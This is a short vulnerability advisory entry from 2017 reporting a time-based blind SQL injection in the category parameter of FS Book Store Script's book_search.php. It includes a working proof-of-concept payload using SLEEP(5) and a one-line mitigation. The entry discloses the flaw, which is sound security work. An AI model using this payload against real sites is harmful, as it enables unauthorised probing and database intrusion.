vendor:
Book Store Script
by:
8bitsec
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: Book Store Script
Affected Version From: 23 October 17
Affected Version To: 23 October 17
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
FS Book Store Script – SQL Injection
SQL injection on [category] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/book_search.php?book_name=xxxxx&category=4 AND SLEEP(5). Parameter: category (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: book_name=xxxxx&category=4 AND SLEEP(5)
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.